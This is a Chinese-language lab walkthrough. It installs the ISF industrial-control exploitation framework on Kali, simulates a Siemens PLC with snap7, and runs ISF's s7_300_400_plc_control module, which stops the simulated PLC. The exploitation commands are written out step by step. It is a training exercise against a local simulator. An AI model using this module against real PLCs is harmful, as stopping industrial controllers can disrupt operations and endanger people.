1.
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
(2)输入cd isf
(3)输入python2 isf.py
(4)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git clone GitHub - johanlundberg/python-nmap: Clone of https://bitbucket.org/xael/python-nmap
B.进入文件夹使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
D.继续执行 python2 isf.py命令进行安装
(这边我没有报错 跳过以上步骤继续实验)
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).用ipconfig查看本机ip,也即物理机IP。
(2)在serverdemo.exe中填写刚刚查看的物理机ip,然后点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示serverstarted
(4)clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
show options
set target 物理机IP
6.输入run
这里显示 stop plc ,同时查看模拟器中的输出,可以发现已经停止